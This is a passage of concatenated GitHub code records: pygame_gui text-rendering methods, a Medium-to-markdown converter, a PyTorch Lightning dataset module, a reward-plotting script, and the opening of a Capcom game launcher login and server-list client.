str,\n state_str: str,\n text_colour_state_str: str,\n text_shadow_colour_state_str: str,\n add_text: bool):\n \"\"\"\n Rebuilds any text or image used by a specific state in the drawable shape. Effectively\n this means adding them on top of whatever is already in the state's surface. 
As such it\n should generally be called last in the process of building up a finished drawable shape\n state.\n\n :param add_text:\n :param image_state_str: image ID of the state we are going to be adding images and text to.\n :param state_str: normal ID of the state we are going to be adding images and text to.\n :param text_colour_state_str: text ID of the state we are going to be adding images and\n text to.\n :param text_shadow_colour_state_str: text shadow ID of the state we are going to be adding\n images and text to.\n\n \"\"\"\n # Draw any themed images\n if image_state_str in self.theming and self.theming[image_state_str] is not None:\n image_rect = self.theming[image_state_str].get_rect()\n image_rect.center = (int(self.containing_rect.width / 2),\n int(self.containing_rect.height / 2))\n basic_blit(self.states[state_str].surface,\n self.theming[image_state_str], image_rect)\n if add_text:\n self.finalise_text(state_str, text_colour_state_str, text_shadow_colour_state_str)\n\n def build_text_layout(self):\n \"\"\"\n Build a text box layout for this drawable shape if it has some text.\n \"\"\"\n containing_rect_when_text_built = self.containing_rect.copy()\n # Draw any text\n if 'text' in self.theming and 'font' in self.theming and self.theming['text'] is not None:\n # we need two rectangles for the text. One is has actual area the\n # text surface takes up, which may be larger than the displayed area,\n # and its position on the final surface. The other is the amount of\n # area of the text surface which we blit from, which may be much smaller\n # than the total text area.\n\n horiz_padding = 0\n if 'text_horiz_alignment_padding' in self.theming:\n horiz_padding = self.theming['text_horiz_alignment_padding']\n\n vert_padding = 0\n if 'text_vert_alignment_padding' in self.theming:\n vert_padding = self.theming['text_vert_alignment_padding']\n\n total_text_buffer = self.shadow_width + self.border_width + self.rounded_corner_offset\n self.text_view_rect = self.containing_rect.copy()\n self.text_view_rect.x = 0\n self.text_view_rect.y = 0\n if self.dynamic_width:\n self.text_view_rect.width = -1\n else:\n self.text_view_rect.width = max(0, self.text_view_rect.width -\n ((total_text_buffer * 2) + (2 * horiz_padding)))\n\n if self.dynamic_height:\n self.text_view_rect.height = -1\n else:\n self.text_view_rect.height = max(0, self.text_view_rect.height -\n ((total_text_buffer * 2) + (2 * vert_padding)))\n\n text_actual_area_rect = self.text_view_rect.copy()\n text_actual_area_rect.x = total_text_buffer + horiz_padding\n text_actual_area_rect.y = total_text_buffer + vert_padding\n if 'text_width' in self.theming:\n text_actual_area_rect.width = self.theming['text_width']\n if 'text_height' in self.theming:\n text_actual_area_rect.height = self.theming['text_height']\n\n text_shadow_data = (0, 0, 0, pygame.Color('#10101070'), False)\n if 'text_shadow' in self.theming:\n text_shadow_data = self.theming['text_shadow']\n text_chunk = TextLineChunkFTFont(self.theming['text'],\n self.theming['font'],\n underlined=False,\n colour=pygame.Color('#FFFFFFFF'),\n using_default_text_colour=True,\n bg_colour=pygame.Color('#00000000'),\n text_shadow_data=text_shadow_data,\n max_dimensions=(text_actual_area_rect.width,\n text_actual_area_rect.height))\n text_chunk.should_centre_from_baseline = True\n default_font_data = {\"font\": self.theming['font'],\n \"font_colour\": (self.theming['normal_text']\n if 'normal_text' in self.theming else\n self.ui_manager.get_theme().get_colour('normal_text', None)),\n 
\"bg_colour\": pygame.Color('#00000000')}\n self.text_box_layout = TextBoxLayout(deque([text_chunk]), text_actual_area_rect,\n self.text_view_rect, line_spacing=1.25,\n default_font_data=default_font_data)\n if 'selected_bg' in self.theming:\n self.text_box_layout.selection_colour = self.theming['selected_bg']\n if 'text_cursor_colour' in self.theming:\n self.text_box_layout.set_cursor_colour(self.theming['text_cursor_colour'])\n self.align_all_text_rows()\n return containing_rect_when_text_built\n\n def finalise_text(self, state_str,\n text_colour_state_str: str = \"\",\n text_shadow_colour_state_str: str = \"\",\n only_text_changed: bool = False):\n \"\"\"\n Finalise the text to a surface with some last-minute data that doesn't require the text\n be re-laid out.\n\n :param only_text_changed:\n :param state_str: The name of the shape's state we are finalising.\n :param text_colour_state_str: The string identifying the text colour to use.\n :param text_shadow_colour_state_str: The string identifying the text shadow\n colour to use.\n \"\"\"\n if self.text_box_layout is not None:\n # copy the pre-text surface & create a new empty text surface for this state\n self.states[state_str].pre_text_surface = self.states[state_str].surface.copy()\n self.states[state_str].text_surface = pygame.surface.Surface(\n self.states[state_str].surface.get_size(), flags=pygame.SRCALPHA, depth=32)\n self.states[state_str].text_surface.fill('#00000000')\n\n if only_text_changed:\n\n self.text_box_layout.blit_finalised_text_to_surf(\n self.states[state_str].text_surface)\n basic_blit(self.states[state_str].surface, self.states[state_str].text_surface,\n (0, 0))\n else:\n self.text_box_layout.set_default_text_colour(self.theming[text_colour_state_str])\n self.text_box_layout.set_default_text_shadow_colour(\n self.theming[text_shadow_colour_state_str])\n self.text_box_layout.finalise_to_surf(self.states[state_str].text_surface)\n basic_blit(self.states[state_str].surface, self.states[state_str].text_surface,\n (0, 0))\n\n def apply_active_text_changes(self):\n \"\"\"\n Updates the shape surface with any changes to the text surface. Useful when we've made\n small edits to the text surface\n \"\"\"\n if self.text_box_layout is not None:\n for state_id, state in self.states.items():\n if state.pre_text_surface is not None and state.text_surface is not None:\n state.surface = state.pre_text_surface.copy()\n basic_blit(state.surface, state.text_surface, (0, 0))\n\n def set_text(self, text: str):\n \"\"\"\n Set the visible text that the drawable shape has on it. 
This call will build a text\n layout and then redraw the final shape with the new, laid out text on top.\n\n :param text: the new string of text to stick on the shape.\n \"\"\"\n self.theming['text'] = text\n self.build_text_layout()\n if 'disabled' in self.states and self.active_state == self.states['disabled']:\n self.redraw_all_states(force_full_redraw=True)\n else:\n self.redraw_all_states()\n\n def set_text_alpha(self, alpha: int):\n \"\"\"\n Set the alpha of just the text and redraw the shape with the new text on top.\n\n :param alpha: the alpha to set.\n \"\"\"\n self.text_box_layout.set_alpha(alpha)\n self.redraw_state(self.active_state.state_id, add_text=False)\n self.finalise_text(self.active_state.state_id, only_text_changed=True)\n\n def redraw_active_state_no_text(self):\n \"\"\"\n Redraw the currently active state with no text.\n \"\"\"\n self.redraw_state(self.active_state.state_id, add_text=False)\n\n def finalise_text_onto_active_state(self):\n \"\"\"\n Lets us draw the active state with no text and then paste the finalised surface from the\n text layout on top. Handy if we are doing some text effects in the text layout we don't want\n to lose by recreating the text from scratch.\n \"\"\"\n self.redraw_state(self.active_state.state_id, add_text=False)\n self.finalise_text(self.active_state.state_id, only_text_changed=True)\n\n def insert_text(self, text: str, layout_index: int, parser: Optional[HTMLParser] = None):\n \"\"\"\n Update the theming when we insert text, then pass down to the layout to do the actual\n inserting.\n :param text: the text to insert\n :param layout_index: where to insert it\n :param parser: an optional parser\n :return:\n \"\"\"\n self.theming['text'] = (self.theming['text'][:layout_index] +\n text +\n self.theming['text'][layout_index:])\n self.text_box_layout.insert_text(text, layout_index, parser)\n\n def toggle_text_cursor(self):\n \"\"\"\n Toggle the edit text cursor/carat between visible and invisible. 
Usually this is run to\n make the cursor appear to flash so it catches user attention.\n \"\"\"\n if self.text_box_layout is not None:\n self.text_box_layout.toggle_cursor()\n self.apply_active_text_changes()\n self.active_state.has_fresh_surface = True\n\n def redraw_state(self, state_str: str, add_text: bool = True):\n \"\"\"\n This method is declared for derived classes to implement but has no default\n implementation.\n\n :param add_text:\n :param state_str: The ID/name of the state to redraw.\n\n \"\"\"\n\n def clean_up_temp_shapes(self):\n \"\"\"\n This method is declared for derived classes to implement but has no default implementation.\n \"\"\"\n\n def collide_point(self, point: Union[pygame.math.Vector2,\n Tuple[int, int],\n Tuple[float, float]]):\n \"\"\"\n This method is declared for derived classes to implement but has no default implementation.\n\n :param point: A point to collide with this shape.\n\n \"\"\"\n\n def set_position(self, point: Union[pygame.math.Vector2,\n Tuple[int, int],\n Tuple[float, float]]):\n \"\"\"\n This method is declared for derived classes to implement but has no default implementation.\n\n :param point: A point to set this shapes position to.\n\n \"\"\"\n\n def set_dimensions(self, dimensions: Union[pygame.math.Vector2,\n Tuple[int, int],\n Tuple[float, float]]):\n \"\"\"\n This method is declared for derived classes to implement but has no default implementation.\n\n :param dimensions: The new dimensions for our shape.\n\n \"\"\"\n","repo_name":"MyreMylar/pygame_gui","sub_path":"pygame_gui/core/drawable_shapes/drawable_shape.py","file_name":"drawable_shape.py","file_ext":"py","file_size_in_byte":31764,"program_lang":"python","lang":"en","doc_type":"code","stars":510,"dataset":"github-code","pt":"35"} +{"seq_id":"18210870404","text":"import requests_html\nimport os\nimport requests\n\ndef get_medium_markdown(article_url):\n server = 'https://medium-to-markdown.now.sh/?url='\n url = server + article_url\n session = requests_html.HTMLSession()\n resp = session.get(url)\n resp.html.render(sleep=6)\n return resp.html.find('textarea')[0].full_text\n\ndef format_medium_markdown(markdown):\n title = get_title_from_markdown(markdown)\n markdown = '\\n'.join(markdown.splitlines()[8:])\n return get_header(title,'',[]) + markdown\n\ndef get_header(title, description,categories=[],toc='true'):\n title = title.replace(':', ' ')\n return f\"\"\"---\ntoc: {toc}\nlayout: post\ncomments: true\ndescription: {description}\ncategories: [Medium]\ntitle: {title}\n---\n\"\"\"\n\nmonth_num_dict = {\n 'Jan':'01',\n 'Feb':'02',\n 'Mar':'03',\n 'Apr':'04',\n 'May':'05',\n 'Jun':'06',\n 'Jul':'07',\n 'Aug':'08',\n 'Sep':'09',\n 'Oct':'10',\n 'Nov':'11',\n 'Dec':'12',\n}\n\ndef get_date_formatted(date):\n split = date[date.index(',')+2:].split(' ')[:3][::-1]\n split[1] = month_num_dict[split[1]]\n return '-'.join(split)\n\ndef get_title_from_markdown(markdown):\n for i in markdown.splitlines():\n if i.startswith('title: '): return i.replace('title: ', '')\n\ndef get_articles(profile):\n session = requests_html.HTMLSession()\n medium_link = f'https://medium.com/feed/@{profile}'.replace('@@','@')\n r = session.get(medium_link)\n for i in r.html.find('channel')[0].find('item'):\n link = i.find('link')[0].html.replace('', '')\n pub_date = i.find('pubDate')[0].text\n categories = i.find('category')\n yield link, get_date_formatted(pub_date), categories\n\n\ndef is_image(line): return line.startswith('![') and line.endswith(')') and 'medium.com' in line\n\ndef get_image_url(line):\n 
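The `month_num_dict` / `get_date_formatted` pair in this record reimplements RFC 2822 date parsing by hand; the standard library already handles feed `pubDate` strings. A drop-in sketch producing the same `YYYY-MM-DD` output:

```python
# Standard-library replacement for the manual month-name mapping above.
from email.utils import parsedate_to_datetime

def pub_date_to_ymd(pub_date):
    # e.g. "Tue, 03 Jun 2008 11:05:30 GMT" -> "2008-06-03"
    return parsedate_to_datetime(pub_date).strftime("%Y-%m-%d")

print(pub_date_to_ymd("Tue, 03 Jun 2008 11:05:30 GMT"))
```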
return line.split('](')[-1].replace(')','').strip()\n\ndef download_image(path, name, url):\n if not os.path.isdir(path): os.mkdir(path)\n try:\n img = requests.get(url,allow_redirects=True)\n with open(f'{path}/{name}.png','wb') as i_file:\n i_file.write(img.content)\n except:\n print('Unable to download key',name,url, 'png')\n\n\ndef download_images(path, name, markdown):\n #not compelete\n new_markdown = []\n path = path + '/' + name\n count = 1\n for line in markdown.splitlines():\n if is_image(line):\n print(line)\n download_image(path, str(count), get_image_url(line))\n url = '{{ site.baseurl }}/images/' + f'{name}/{count}.png'\n new_markdown.append(line.split(']')[0] + '](' + url+')')\n count+=1;\n else:\n new_markdown.append(line)\n return '\\n'.join(new_markdown)","repo_name":"abhinavsp0730/medium-to-fastpages","sub_path":"util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":2707,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"25491524888","text":"import os\nimport numpy as np\nfrom typing import List, Union, Dict\nimport torch\nimport torch.nn.functional as F\nfrom torch.utils.data import DataLoader, TensorDataset, Dataset, WeightedRandomSampler, RandomSampler\nimport torchvision\nimport pytorch_lightning as pl\nfrom sklearn import datasets as sk_dataset\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.model_selection import train_test_split\nfrom loguru import logger\nimport math\n\nDATA_PATH=\"../data\"\n#os.makedirs(DATA_PATH, exist_ok=True)\n\nTORCH_SET = [\"mnist\", \"fashion_mnist\", \"cifar10\", \"cifar100\",]\nSKLEAN_SET = [\"wine\", \"boston\", \"iris\", \"diabete\", \"digits\", \"linnerud\"]\nOTHER_SET = [\"arithmetic\", \"multi_scale_feature\", \"scm\"]\nDATA_SET = TORCH_SET + SKLEAN_SET + OTHER_SET\n\nfrom .utils import str2dic, bool_flag\nfrom .datasets.multi_scale_feature import get_dataloader as get_dataloader_msf\nfrom .datasets.scm import get_dataloader as get_dataloader_scm\n\ndef sigmoidal(x) : return torch.erf(x / np.sqrt(2))\ndef id(x) : return x\ng_dic = {\n \"id\" : id,\n 'relu' : F.relu,\n 'tanh' : F.tanh,\n \"sigmoid\" : sigmoidal,\n}\n\nclass DatasetWithIndexes(Dataset):\n def __init__(self, dataset):\n self.dataset = dataset\n \n def __getitem__(self, index):\n data, target = self.dataset[index]\n return data, target, index\n\n def __len__(self):\n return len(self.dataset)\n\ndef get_dataloader(x, y, train_pct, include_indexes = False, train_batch_size = None, val_batch_size = None, num_workers=0, return_just_set = True):\n \"\"\"We define a data constructor that we can use for various purposes later.\"\"\"\n \n dataset = TensorDataset(x, y)\n if include_indexes :\n dataset = DatasetWithIndexes(dataset)\n n = len(dataset)\n train_size = train_pct * n // 100\n val_size = n - train_size\n print(f\"train_size, val_size : {train_size}, {val_size}\")\n\n train_set, val_set = torch.utils.data.random_split(dataset, [train_size, val_size])\n\n if return_just_set :\n return train_set, val_set\n\n assert train_batch_size is not None\n assert val_batch_size is not None\n train_loader = DataLoader(train_set, batch_size=min(train_batch_size, train_size), shuffle=True, drop_last=False, pin_memory=True, num_workers=num_workers)\n val_loader = DataLoader(val_set, batch_size=min(val_batch_size, val_size), shuffle=False, drop_last=False, num_workers=num_workers)\n dataloader = DataLoader(dataset, batch_size=min(train_batch_size, n), shuffle=False, drop_last=False, 
num_workers=num_workers)\n\n data_infos = {\n \"train_batch_size\" : min(train_batch_size, train_size), \"val_batch_size\" : min(val_batch_size, val_size), \n \"train_size\":train_size, \"val_size\":val_size, \n \"train_n_batchs\":len(train_loader), \"val_n_batchs\":len(val_loader)\n }\n\n return train_loader, val_loader, dataloader, data_infos\n\ndef cut_dataset(dataset, pct):\n n = len(dataset)\n size = pct * n // 100\n print(f\"size, n-size : {size}, {n-size}\")\n remaining, _ = torch.utils.data.random_split(dataset, [size, n - size])\n return remaining\n\ndef get_arithmetic_set(p, regression, operator=\"+\", ij_equal_ji = True, modular = True):\n \"\"\"We define a data constructor that we can use for various purposes later.\"\"\"\n assert operator in [\"+\", \"*\"]\n if ij_equal_ji :\n x = []\n for i in range(p) :\n for j in range(i, p) :\n x.append([i, j])\n x = torch.LongTensor(x) # (p*(p+1)/2, 2)\n else :\n ij = torch.arange(p) # (p,)\n x = torch.cartesian_prod(ij, ij) # (p^2, 2)\n y = x.sum(1) if operator==\"+\" else x.prod(1) # (p*(p+1)/2,) if ij_equal_ji, else # (p^2,)\n if modular : y = torch.remainder(y, p)\n if regression : y = y.float() \n return x, y\n\nclass LMLightningDataModule(pl.LightningDataModule):\n def __init__(\n self,\n dataset_name : str,\n train_batch_size: int,\n val_batch_size: int,\n train_pct: int = 100,\n val_pct: int = 100,\n use_sampler : bool = False, \n data_path: str = DATA_PATH,\n num_workers: int = 0, \n ):\n super(LMLightningDataModule, self).__init__()\n assert dataset_name in DATA_SET \\\n or \"arithmetic\" in dataset_name \\\n or 'scm' in dataset_name\n if dataset_name in SKLEAN_SET \\\n or \"arithmetic\" in dataset_name :\n assert 0 < train_pct < 100\n self.dataset_name = dataset_name\n self.train_batch_size = train_batch_size\n self.val_batch_size = val_batch_size\n self.train_pct = train_pct\n self.val_pct = val_pct\n self.data_path = data_path\n self.num_workers = num_workers\n\n self.use_sampler = use_sampler\n self.sampler = None\n\n self.prepare_data()\n \n def prepare_data(self):\n logger.info(f\"Dataset {self.dataset_name} loading....\")\n os.makedirs(self.data_path, exist_ok=True)\n h_in, w_in = 0, 0\n tmp = {}\n if self.dataset_name == \"mnist\" :\n # https://discuss.pytorch.org/t/normalization-in-the-mnist-example/457?u=pascal_notsawo\n # https://discuss.pytorch.org/t/normalization-in-the-mnist-example/457/31?u=pascal_notsawo\n \"\"\"\n data = train_dataset.data.float()\n mean = np.round(data.mean(axis=(0,1,2))/255,4)\n std = np.round(data.std(axis=(0,1,2))/255,4)\n \"\"\"\n mean, std = 0.1307000070810318, 0.30809998512268066\n transform = torchvision.transforms.Compose([\n torchvision.transforms.ToTensor(),\n torchvision.transforms.Normalize((mean,), (std,))])\n self.train_dataset = torchvision.datasets.MNIST(self.data_path, train=True, download=True, transform = transform)\n self.val_dataset = torchvision.datasets.MNIST(self.data_path, train=False, download=True, transform = transform)\n c_in, h_in, w_in, n_class = 1, 28, 28, 10\n task = \"classification\"\n classes = tuple(range(10))\n elif self.dataset_name == \"fashion_mnist\" :\n mean, std = 0.28600001335144043, 0.3529999852180481\n transform = torchvision.transforms.Compose([\n torchvision.transforms.ToTensor(),\n torchvision.transforms.Normalize((mean,), (std,))])\n self.train_dataset = torchvision.datasets.FashionMNIST(self.data_path, train=True, download=True, transform = transform)\n self.val_dataset = torchvision.datasets.FashionMNIST(self.data_path, train=False, 
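For intuition, a hand-computed example of get_arithmetic_set above with p=3 (six unordered pairs, sums taken mod p):

    x, y = get_arithmetic_set(p=3, regression=False, operator="+", ij_equal_ji=True, modular=True)
    # x enumerates the p*(p+1)/2 = 6 unordered pairs:
    #   [0,0], [0,1], [0,2], [1,1], [1,2], [2,2]
    # y is the pairwise sum mod p:
    #   [0, 1, 2, 2, 0, 1]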
download=True, transform = transform)\n            c_in, h_in, w_in, n_class = 1, 28, 28, 10\n            task = \"classification\"\n            classes = tuple(range(10))\n        elif self.dataset_name == \"cifar10\" :\n            #mean, std = [0.4914, 0.4822, 0.4465], [0.247, 0.2435, 0.2616]\n            mean, std = [0.5, 0.5, 0.5], [0.5, 0.5, 0.5]\n            train_transform = torchvision.transforms.Compose([\n                torchvision.transforms.ToTensor(),\n                torchvision.transforms.Normalize(mean=mean, std=std),\n                # https://medium.com/mlearning-ai/cifar10-image-classification-in-pytorch-e5185176fbef\n                #torchvision.transforms.RandomResizedCrop(224), # h_in = w_in = 224\n                #torchvision.transforms.RandomCrop(32, padding=4, padding_mode='reflect'),\n                #torchvision.transforms.RandomHorizontalFlip(p=0.5)\n            ])\n            transform = torchvision.transforms.Compose([\n                torchvision.transforms.ToTensor(),\n                torchvision.transforms.Normalize(mean=mean, std=std)])\n            self.train_dataset = torchvision.datasets.CIFAR10(self.data_path, train=True, download=True, transform = train_transform)\n            self.val_dataset = torchvision.datasets.CIFAR10(self.data_path, train=False, download=True, transform = transform)\n            c_in, h_in, w_in, n_class = 3, 32, 32, 10\n            task = \"classification\"\n            classes = ('plane', 'car', 'bird', 'cat', 'deer', 'dog', 'frog', 'horse', 'ship', 'truck')\n        elif self.dataset_name == \"cifar100\" :\n            #mean, std = [0.5071, 0.4865, 0.4409], [0.2673, 0.2564, 0.2762]\n            mean, std = [0.5, 0.5, 0.5], [0.5, 0.5, 0.5]\n            train_transform = torchvision.transforms.Compose([\n                torchvision.transforms.ToTensor(),\n                torchvision.transforms.Normalize(mean=mean, std=std),\n                # https://medium.com/mlearning-ai/cifar10-image-classification-in-pytorch-e5185176fbef\n                #torchvision.transforms.RandomResizedCrop(224), # h_in = w_in = 224\n                #torchvision.transforms.RandomCrop(32, padding=4, padding_mode='reflect'),\n                #torchvision.transforms.RandomHorizontalFlip(p=0.5)\n            ])\n            transform = torchvision.transforms.Compose([\n                torchvision.transforms.ToTensor(),\n                torchvision.transforms.Normalize(mean=mean, std=std)])\n            self.train_dataset = torchvision.datasets.CIFAR100(self.data_path, train=True, download=True, transform = train_transform)\n            self.val_dataset = torchvision.datasets.CIFAR100(self.data_path, train=False, download=True, transform = transform)\n            c_in, h_in, w_in, n_class = 3, 32, 32, 100\n            task = \"classification\"\n            # TODO : https://www.cs.toronto.edu/~kriz/cifar.html\n            classes = tuple(range(100))\n        elif self.dataset_name == \"wine\" :\n            # recognize the wine class given the features like the amount of alcohol, magnesium, phenol, color intensity, etc\n            dataset = sk_dataset.load_wine()\n            classes = tuple(dataset[\"target_names\"])\n            c_in, n_class = 13, len(classes)\n            task = \"classification\"\n        elif self.dataset_name == \"boston\" :\n            # houses in Boston like the crime rate, nitric oxides concentration, number of rooms, distances to employment centers, tax rates, etc. 
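The commented-out per-channel statistics in the CIFAR branches above can be recomputed in a few lines; a sketch with a hypothetical download path, not part of the module:

    import numpy as np
    import torchvision

    ds = torchvision.datasets.CIFAR10("../data", train=True, download=True)
    data = ds.data / 255.0                          # uint8 (50000, 32, 32, 3) scaled to [0, 1]
    print(np.round(data.mean(axis=(0, 1, 2)), 4))   # ~ [0.4914, 0.4822, 0.4465]
    print(np.round(data.std(axis=(0, 1, 2)), 4))    # ~ [0.247, 0.2435, 0.2616]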
\n            # The output feature is the median value of homes.\n            dataset = sk_dataset.load_boston()\n            c_in, n_class = 13, 1\n            task = \"regression\"\n            classes = None\n        elif self.dataset_name == \"iris\" :\n            # It contains sepal and petal lengths and widths for three classes of plants\n            dataset = sk_dataset.load_iris()\n            classes = tuple(dataset[\"target_names\"])\n            c_in, n_class = 4, len(classes)\n            task = \"classification\"\n        elif self.dataset_name == \"diabete\" :\n            # the diabetes dataset (regression)\n            dataset = sk_dataset.load_diabetes()\n            c_in, n_class = 10, 1\n            task = \"regression\"\n            classes = None\n        elif self.dataset_name == \"digits\" :\n            # Load and return the digits dataset (classification)\n            dataset = sk_dataset.load_digits()\n            classes = tuple(dataset[\"target_names\"])\n            c_in, n_class = 64, len(classes)\n            task = \"classification\"\n        elif self.dataset_name == \"linnerud\" :\n            # Load and return the physical exercise Linnerud dataset (regression)\n            dataset = sk_dataset.load_linnerud()\n            c_in, n_class = 3, 3\n            task = \"regression\"\n            classes = None\n        elif \"arithmetic\" in self.dataset_name :\n            #\"arithmetic,op=+,p=200,reg=False,mod=True,ijeqji=True\"\n            s = self.dataset_name.split(\"arithmetic,\")[1].strip()\n            s = str2dic(s)\n            #assert 'p' in s.keys()\n            op, p, reg, mod, ijeqji = s[\"op\"], int(s[\"p\"]), bool_flag(s[\"reg\"]), bool_flag(s[\"mod\"]), bool_flag(s[\"ijeqji\"])\n            tmp = {\"p\" : p, \"regression\" : reg, \"operator\" : op, \"ij_equal_ji\" : ijeqji, \"modular\" : mod}\n            #x, y = get_arithmetic_set(p, regression=reg, operator=op, ij_equal_ji = ijeqji, modular = mod)\n            x, y = get_arithmetic_set(**tmp)\n            self.train_dataset, self.val_dataset = get_dataloader(\n                x, y,\n                train_pct=self.train_pct, \n                num_workers=self.num_workers\n            )\n            n_class = 2*(p-1)+1 if op == \"+\" else (p-1)**2+1\n            n_class = p if mod else n_class\n            n_class = 1 if reg else n_class\n            if reg :\n                classes = None\n                task = \"regression\" if reg else \"classification\"\n            else :\n                classes = tuple(range(n_class))\n                task = \"regression\" if reg else \"classification\"\n            c_in = 0\n        elif self.dataset_name == \"multi_scale_feature\" :\n            c_in, n_class = 100, 1\n            task = \"regression\"\n            classes = None\n            \n            train_size, val_size = 150, 1000\n            k = [50, 100000]\n            self.train_dataset, self.val_dataset = get_dataloader_msf(\n                train_size, val_size, \n                d=c_in, k=k, noise = 0.0, seed = 100, \n                task = task,\n            )\n        elif \"scm\" in self.dataset_name:\n            g_dic = {\n                \"id\" : id,\n                'relu' : F.relu,\n                'tanh' : F.tanh,\n                \"sigmoid\" : sigmoidal,\n            }\n            #\"scm,N=784,M=4,fixed_w=False,scm=False,g=id,noise=0.0,out_dim=1\"\n            s = self.dataset_name.split(\"scm,\")[1].strip()\n            s = str2dic(s)\n            N, M, fixed_w, scm, g = int(s[\"N\"]), int(s[\"M\"]), bool_flag(s[\"fixed_w\"]), bool_flag(s[\"scm\"]), s[\"g\"] \n            noise, out_dim = float(s.get(\"noise\", 0.0)), int(s.get(\"out_dim\", 1))\n            g = g_dic[g]\n            tmp = {\"N\" : N, \"M\" : M, \"fixed_w\" : fixed_w, \"scm\" : scm, \"g\" : g, \"out_dim\": out_dim}\n            c_in, n_class = N, out_dim\n            task = \"regression\"\n            classes = None\n            \n            train_size, val_size = 150, 1000\n            k = [1, 50, 100000]\n            k = None\n            self.train_dataset, self.val_dataset = get_dataloader_scm(\n                train_size, val_size, \n                N=N, M=M, out_dim=out_dim, g=g, \n                mu_x = 0.0, sigma_x = 1.0, # data\n                mu_w = 0.0, sigma_w = 1.0, # feature map\n                mu_v = 0.0, sigma_v = 1.0, # output layer\n                mu_noise = 1.0, sigma_noise = noise, # noise\n                k=k, seed = 100, task = task,\n            )\n        else :\n            # TODO : https://scikit-learn.org/stable/datasets/real_world.html\n            raise Exception(\"Unknown 
dataset : %s\" % self.dataset_name)\n\n if self.dataset_name in SKLEAN_SET :\n x = dataset[\"data\"]\n # Scale data to have mean 0 and variance 1 \n # which is importance for convergence of the neural network\n scaler = StandardScaler()\n x = scaler.fit_transform(x)\n\n y = torch.from_numpy(dataset[\"target\"])\n if task == \"regression\" : y = y.float()\n else : y = y.long()\n\n self.train_dataset, self.val_dataset = get_dataloader(\n torch.from_numpy(x).float(), y,\n train_pct=self.train_pct, \n num_workers=self.num_workers\n )\n\n cond = (self.dataset_name not in SKLEAN_SET) and (\"arithmetic\" not in self.dataset_name) \n if cond and (0 < self.train_pct < 100) :\n self.train_dataset = cut_dataset(self.train_dataset, pct=self.train_pct)\n if 0 < self.val_pct < 100 :\n self.val_dataset = cut_dataset(self.val_dataset, pct=self.val_pct)\n\n self.train_dataset = DatasetWithIndexes(self.train_dataset)\n self.val_dataset = DatasetWithIndexes(self.val_dataset)\n\n train_size = len(self.train_dataset)\n val_size = len(self.val_dataset)\n self.train_batch_size = min(self.train_batch_size, train_size)\n self.val_batch_size = min(self.val_batch_size, val_size)\n self.data_infos = {\n \"c_in\" : c_in, \"h_in\" : h_in, \"w_in\" : w_in, \"n_class\" : n_class,\n \"classes\" : classes, \"task\" : task,\n \"train_batch_size\" : self.train_batch_size, \"val_batch_size\" : self.val_batch_size, \n \"train_size\":train_size, \"val_size\":val_size, \"size\" : train_size + val_size,\n \"train_n_batchs\":len(self.train_dataloader()), \"val_n_batchs\":len(self.val_dataloader())\n }\n for k, v in tmp.items() : self.data_infos[k] = v\n\n logger.info(self.data_infos)\n for k, v in self.data_infos.items() : logger.info(str(k) + \" --> \" + str(v))\n\n if self.use_sampler :\n weights = torch.ones(train_size) / train_size \n num_samples = train_size\n #num_samples = math.ceil(train_size / self.train_batch_size) * max_epochs\n self.sampler = WeightedRandomSampler(weights = weights, num_samples=num_samples, replacement=True, generator=None)\n #self.sampler = RandomSampler(data_source=self.train_dataset, replacement=True, num_samples=num_samples, generator=None)\n\n def train_dataloader(self) -> Union[DataLoader, List[DataLoader], Dict[str, DataLoader]]:\n return DataLoader(\n self.train_dataset,\n batch_size=self.train_batch_size,\n num_workers=self.num_workers,\n shuffle=not self.use_sampler,\n sampler=self.sampler\n )\n\n def val_dataloader(self) -> Union[DataLoader, List[DataLoader]]:\n return DataLoader(\n self.val_dataset,\n batch_size=self.val_batch_size,\n num_workers=self.num_workers,\n )\n\n def test_dataloader(self) -> Union[DataLoader, List[DataLoader]]:\n return DataLoader(\n self.val_dataset,\n batch_size=self.val_batch_size,\n num_workers=self.num_workers,\n )\n\n\nif __name__ == \"__main__\":\n\n data_module = LMLightningDataModule(\n dataset_name = \"mnist\",\n train_batch_size = 512,\n val_batch_size = 1000,\n num_workers = 0,\n \n )\n print(data_module.data_infos)\n \n x, y = next(iter(data_module.train_dataloader()))\n print(x.shape, y.shape)","repo_name":"Tikquuss/sag_torch","sub_path":"src/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":18050,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"26779437774","text":"import pandas as pd\nimport matplotlib.pyplot as plt\n\n# PATH = 
'/home/dchipping/project/dan-track/ahm-agent/results/policies/train-results/41c8d3f3-c23e/2022-09-09T15-58-23/PPO_motgym:JDE_Mot17SequentialEnv-v0_e0754_00000_0_2022-09-09_15-58-34/progress.csv'\nPATH = '/home/dchipping/project/dan-track/ahm-agent/results/a256cb6c-3d5f/2022-09-11T00-05-54/PPO_motgym:JDE_Mot17SequentialEnv-v0_2dd5c_00000_0_2022-09-11_00-06-19/progress.csv'\n\ndf = pd.read_csv(PATH)\neps = df['episodes_total']\nrwd = df['episode_reward_mean']\n\nwith plt.style.context('ggplot'):\n plt.plot(eps, rwd)\n # plt.title('Mean Episode Reward')\n plt.xlabel('Episodes')\n plt.ylabel('Episode Reward')\n plt.show()","repo_name":"dchipping/lahm-track","sub_path":"tools/graphing.py","file_name":"graphing.py","file_ext":"py","file_size_in_byte":690,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"30953863165","text":"import socket\nimport io\nimport json\n\nfrom net import *\nimport requests\nfrom bs4 import BeautifulSoup\n\ndef cog_jp_login(username, password):\n url_base = 'https://www.capcom-onlinegames.jp/auth/launcher/'\n\n # Startup session and get cookies from the start page.\n sess = requests.Session()\n sess.get(url_base + 'start.html?q=711')\n\n # Post our login request\n data = {\n 'id':username,\n 'pw':password,\n 'svid': 1000,\n 'lifetime': 60,\n 'fromURL': 'http://cog-members.mhf-z.jp',\n }\n resp = sess.post(url_base + 'login', data=data)\n\n # Parse the result.\n s = BeautifulSoup(resp.content, features='html.parser')\n login_result = json.loads(s.select('input')[0].get('value'))\n if login_result['code'] != '000':\n raise Exception('Error on cog jp login')\n\n return login_result['skey']\n\ndef cog_jp_serverlist_get_first():\n resp = requests.get('http://srv-mhf.capcom-networks.jp/serverlist.xml')\n s = BeautifulSoup(resp.content, features='html.parser')\n 